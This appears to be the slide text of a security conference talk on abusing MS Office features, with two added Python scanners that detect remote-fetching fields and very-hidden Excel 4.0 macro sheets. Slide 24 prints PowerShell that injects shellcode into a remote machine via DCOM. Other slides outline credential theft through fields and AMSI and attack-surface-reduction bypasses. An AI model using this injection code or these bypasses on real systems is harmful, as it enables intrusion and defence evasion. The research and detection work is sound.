MS Office in Wonderland

HackerNews

Published 2019/05/10 in the Science category

Text content
1. MS OFFICE IN WONDERLAND Stan Hegt & Pieter Ceelen BlackHat Asia, March 2019
2. Pieter, Stan. Most MS Office malware focuses on well-known tricks such as DDE and VBA macros. But there is so much more functionality in Word and Excel that can be abused. We'll take you on a journey down the rabbit hole!
3. WHO NEEDS CODE EXECUTION ANYWAY?
4. ABOUT FIELDS www.outflank.nl 3
5. INCLUDEPICTURE
6. CREDENTIAL THEFT CVE-2019-0540
7. CVE-2019-0540 – CREDENTIAL THEFT: in the header of a DotX file, the INCLUDEPICTURE URL is made dynamic by adding the USERNAME field; Word does not continue loading as long as the picture is not loaded.
8. ARBITRARY FILE READ CVE-2019-0561
9. CVE-2019-0561 – ARBITRARY FILE READING (1/2) A revisit of CVE-2002-1143: in 2002, an INCLUDETEXT field could read an arbitrary file. MS fix: the INCLUDETEXT field is not updated on various events and as such is no longer dynamic. Or is it still ...?
10. CVE-2019-0561 – ARBITRARY FILE READING (2/2)
11. MITIGATION
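Added example (not from the slides and not Outflank's code): a Python scanner that unpacks a .docx/.dotx, reconstructs the field codes stored in the body, header and footer parts, and flags INCLUDEPICTURE/INCLUDETEXT fields whose target is remote and assembled from a nested field, which is the on-disk shape of the header trick described in slides 6 and 7. The template it scans is constructed in memory with placeholder.invalid as the host; part names and the reconstruction of nested fields per paragraph follow the OOXML WordprocessingML layout.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

NS_W = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
W = "{%s}" % NS_W
# Field types that make Word load content from a path or URL when the field updates.
FETCHING_FIELDS = ("INCLUDEPICTURE", "INCLUDETEXT")
# http(s) URLs or UNC paths; both leave the machine when the field is updated.
REMOTE_TARGET = re.compile(r"(https?://|\\\\)", re.IGNORECASE)


def collect_fields(part_xml):
    """Return (field_code, begin_marker_count) for every paragraph holding a field.

    Word stores a complex field as runs between fldChar begin/end markers, with the
    instruction text in w:instrText runs. A nested field (USERNAME inside the
    INCLUDEPICTURE URL) lives in the same paragraph, so joining the instrText runs
    per paragraph reconstructs the complete instruction Word will evaluate.
    """
    root = ET.fromstring(part_xml)
    out = []
    for para in root.iter(W + "p"):
        code = "".join(t.text or "" for t in para.iter(W + "instrText"))
        for simple in para.iter(W + "fldSimple"):  # simple fields keep the code in an attribute
            code += " " + (simple.get(W + "instr") or "")
        begins = sum(1 for fc in para.iter(W + "fldChar")
                     if fc.get(W + "fldCharType") == "begin")
        if code.strip():
            out.append((" ".join(code.split()), begins))
    return out


def scan_document(data):
    """Scan the body, header and footer parts of a .docx/.dotx for fetching fields."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            if not (name.startswith("word/") and name.endswith(".xml")):
                continue
            if name != "word/document.xml" and "header" not in name and "footer" not in name:
                continue
            for code, begins in collect_fields(z.read(name)):
                if not any(k in code.upper() for k in FETCHING_FIELDS):
                    continue
                findings.append({
                    "part": name,
                    "field": code,
                    "remote": bool(REMOTE_TARGET.search(code)),
                    "nested_fields": begins,        # more than one: target is built dynamically
                    "in_header": "header" in name,  # header fields are updated on open
                })
    return findings


def build_sample():
    """Constructed sample: a minimal template with a nested field in its header."""
    header = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<w:hdr xmlns:w="%s"><w:p>'
        '<w:r><w:fldChar w:fldCharType="begin"/></w:r>'
        '<w:r><w:instrText xml:space="preserve"> INCLUDEPICTURE "http://placeholder.invalid/p/</w:instrText></w:r>'
        '<w:r><w:fldChar w:fldCharType="begin"/></w:r>'
        '<w:r><w:instrText xml:space="preserve"> USERNAME </w:instrText></w:r>'
        '<w:r><w:fldChar w:fldCharType="separate"/></w:r>'
        '<w:r><w:t>jdoe</w:t></w:r>'
        '<w:r><w:fldChar w:fldCharType="end"/></w:r>'
        '<w:r><w:instrText xml:space="preserve">.png" </w:instrText></w:r>'
        '<w:r><w:fldChar w:fldCharType="end"/></w:r>'
        '</w:p></w:hdr>'
    ) % NS_W
    body = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<w:document xmlns:w="%s"><w:body><w:p>'
        '<w:fldSimple w:instr=" PAGE "><w:r><w:t>1</w:t></w:r></w:fldSimple>'
        '</w:p></w:body></w:document>'
    ) % NS_W
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("word/document.xml", body)
        z.writestr("word/header1.xml", header)
    return buf.getvalue()


if __name__ == "__main__":
    for finding in scan_document(build_sample()):
        print(finding)
```

The benign PAGE field in the body is ignored; the header field is reported with remote=True and nested_fields=2, which is the combination worth alerting on: a fetching field whose target only becomes known at update time. Run it over a directory of templates to find the same pattern in real files.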
12. MEET M: GET&TRANSFORM ABUSE
13. GIVE ME THE POWER! Fields are old school and patched… Now the same tricks with new school techniques
14. STEALING UNATTEND.XML A GET&TRANSFORM query definition in M retrieves unattend.xml. Column A: retrieving data from the file (GET&TRANSFORM). Column B: posting the results (WEBSERVICE, max 2048 chars).
15. WHAT ELSE CAN BE DONE? Ongoing research, there is a lot more to retrieve using this feature
16. WHO NEEDS VBA FOR MACROS ANYWAY?
17. ENTERING THE MACRO RABBIT HOLE VBA != Macros: there are at least two macro languages supported by MS Office • Visual Basic for Applications (VBA) • Excel 4.0 macros (XLM, only in Excel) VBA != VBA: for VBA there are 2 intermediary languages • P-code • Exe-codes
18. HOW TO INSERT AN XLM MACRO
20. HIDING YOUR EXCEL 4.0 MACRO
21. HIDING YOUR EXCEL 4.0 MACRO Can be achieved with one line of VBA: ActiveSheet.Visible = xlSheetVeryHidden Then remove the VBA code and save the Excel file
22. AV INDUSTRY FORGOT ABOUT 1992 TECHNOLOGY
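Added example (not from the slides and not Evil Clippy or any Outflank tool): Python that reads xl/workbook.xml and xl/_rels/workbook.xml.rels from an .xlsm/.xlsx package and lists each sheet with its visibility state and whether it is an Excel 4.0 macro sheet. This is how the xlSheetVeryHidden trick above looks on disk: a veryHidden state on a sheet whose relationship type is xlMacrosheet rather than worksheet. The workbook it inspects is constructed in memory; the relationship type constant is the one Excel writes for XLM sheets.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

NS_MAIN = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
NS_R = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
NS_PKG = "http://schemas.openxmlformats.org/package/2006/relationships"
# Relationship type Excel uses for an Excel 4.0 (XLM) macro sheet part.
XLM_REL = "http://schemas.microsoft.com/office/2006/relationships/xlMacrosheet"


def list_sheets(data):
    """Return one record per sheet: name, visibility state and whether it is XLM.

    workbook.xml declares every sheet and its state (visible, hidden, veryHidden);
    what kind of part the sheet points at is only visible in workbook.xml.rels,
    where macro sheets use the xlMacrosheet relationship type.
    """
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        wb = ET.fromstring(z.read("xl/workbook.xml"))
        rels = ET.fromstring(z.read("xl/_rels/workbook.xml.rels"))
    rel_by_id = {r.get("Id"): (r.get("Type"), r.get("Target"))
                 for r in rels.iter("{%s}Relationship" % NS_PKG)}
    sheets = []
    for sh in wb.iter("{%s}sheet" % NS_MAIN):
        rtype, target = rel_by_id.get(sh.get("{%s}id" % NS_R), ("", ""))
        sheets.append({
            "name": sh.get("name"),
            "state": sh.get("state", "visible"),  # attribute is absent for visible sheets
            "xlm": rtype == XLM_REL,
            "part": target,
        })
    return sheets


def hidden_macro_sheets(data):
    """XLM sheets the Excel GUI will not show (hidden or veryHidden)."""
    return [s for s in list_sheets(data) if s["xlm"] and s["state"] != "visible"]


def build_sample():
    """Constructed sample: a visible worksheet, a hidden worksheet and a veryHidden XLM sheet."""
    workbook = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<workbook xmlns="%s" xmlns:r="%s"><sheets>'
        '<sheet name="Sheet1" sheetId="1" r:id="rId1"/>'
        '<sheet name="Notes" sheetId="2" state="hidden" r:id="rId2"/>'
        '<sheet name="Macro1" sheetId="3" state="veryHidden" r:id="rId3"/>'
        '</sheets></workbook>'
    ) % (NS_MAIN, NS_R)
    rels = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Relationships xmlns="%s">'
        '<Relationship Id="rId1" Type="%s/worksheet" Target="worksheets/sheet1.xml"/>'
        '<Relationship Id="rId2" Type="%s/worksheet" Target="worksheets/sheet2.xml"/>'
        '<Relationship Id="rId3" Type="%s" Target="macrosheets/sheet1.xml"/>'
        '</Relationships>'
    ) % (NS_PKG, NS_R, NS_R, XLM_REL)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("xl/workbook.xml", workbook)
        z.writestr("xl/_rels/workbook.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    for sheet in list_sheets(build_sample()):
        print(sheet)
    print("hidden XLM sheets:", [s["name"] for s in hidden_macro_sheets(build_sample())])
```

Plain hidden worksheets are common in legitimate files, so only the combination of an xlMacrosheet part and a non-visible state is reported; the presence of any xlMacrosheet part at all is already rare enough in modern documents to be worth a lower-severity flag.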
23. XLM VIA SYLK XLM macros are also supported in SYLK files • Text-based file format which originates from the 80s • SYLK (.slk) files never open in the protected mode sandbox! • Turned out to be an RCE on MS Office 2011 for Mac (won't fix) Integrated into SharpShooter by MDSec: https://github.com/mdsecactivebreach/SharpShooter/blob/master/modules/excel4.py
24. XLM EXPOSURE VIA (D)COM Shellcode injection into a remote system with XLM via ExecuteExcel4Macro:
$excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", "server01"));
$memaddr = $excel.ExecuteExcel4Macro('CALL("Kernel32","VirtualAlloc","JJJJJ",0,833,4096,64)');
$ret = $excel.ExecuteExcel4Macro('CALL("Kernel32","WriteProcessMemory","JJJCJJ",-1, ' + ($memaddr + 0) + ', ' + "CHAR`(252`)" + ', 1, 0)');
...
$ret = $excel.ExecuteExcel4Macro('CALL("Kernel32","WriteProcessMemory","JJJCJJ",-1, ' + ($memaddr + 832) + ', ' + "CHAR`(232`)" + ', 1, 0)');
$excel.ExecuteExcel4Macro('CALL("Kernel32","CreateThread","JJJJJJJ",0, 0, ' + $memaddr + ', 0, 0, 0)');
PowerShell and Cobalt Strike implementations available at: https://github.com/outflanknl/Excel4-DCOM
25. P-CODE
26. INTRODUCING EVIL CLIPPY It looks like your maldoc does not yet bypass AV. Do you want me to help? https://github.com/outflanknl/EvilClippy
27. EVIL CLIPPY FEATURES Current features • Cross-platform (runs on OSX, Linux, Windows) • Hide macros from GUI editor • Fool analyst tools by removing module names • VBA stomping (p-code abuse) • Serve payloads via HTTP templates Available at https://github.com/outflanknl/EvilClippy
28. HOW EFFECTIVE IS THIS? (BEFORE CLIPPY)
29. HOW EFFECTIVE IS THIS? (AFTER CLIPPY)
30. BYPASSING MODERN DEFENSES: AMSI & ASR
31. VBA & ANTIMALWARE SCANNING INTERFACE Specific triggers: any COM method or Win32 API call (Shell etc.). AMSI also catches p-code. MacroRuntimeScope: Disable, Low Trust documents, All documents
32. BYPASSING AMSI FOR MACROS Technique / example procedures: • Abuse non-VBA functionality: fields & PowerQuery; Excel 4.0 macros • Execution outside of MacroRuntimeScope: drop malicious code into trusted locations • Non-trigger COM & Win32 API functions: Application.ExecuteExcel4Macro; CreateObject("Excel.Application") and calling DDEInitialize; WMI SpawnInstance • VBA functions that are not in AMSI logs (not COM & not Win32 API): Application.SendKeys; a macro creates a .bat and .reg in startup by using Word SaveAs .txt, the reg key disables AMSI by altering MacroRuntimeScope
33. ATTACK SURFACE REDUCTION RULES Rules enforced by Windows Defender Exploit Guard. Block Win32 API calls from Office macro (static rule). Bypass: invoke API calls without VBA signature using ExecuteExcel4Macro. Block all Office applications from creating child processes (dynamic rule). Bypass: let another process do the dirty job, such as the running instance of explorer.exe (can be achieved via COM and WMI)
34. RELATED RESEARCH • MS Office Magic Show (DerbyCon 2018) https://outflank.nl/blog/2018/10/28/recordings-of-our-derbycon-andbrucon-presentations/ • MS Office File Format Sorcery (TROOPERS19) Video recording to be released • VBA stomping by Walmart team https://vbastomp.com • Pcodedmp tool by Dr. Bontchev https://github.com/bontchev/pcodedmp • SharpShooter by Dominic Chell (MDSec) https://www.mdsec.co.uk/2019/02/macros-and-more-withsharpshooter-v2-0/ • Office lateral movement and DCOM by Philip Tsukerman (Cybereason) https://www.cybereason.com/blog/dcom-lateral-movement-techniques
35. Pieter Ceelen Stan Hegt @PtrPieter @StanHacked +31 6 5157 2696 pieter@outflank.nl www.outflank.nl/pieter +31 6 1188 5039 stan@outflank.nl www.outflank.nl/stan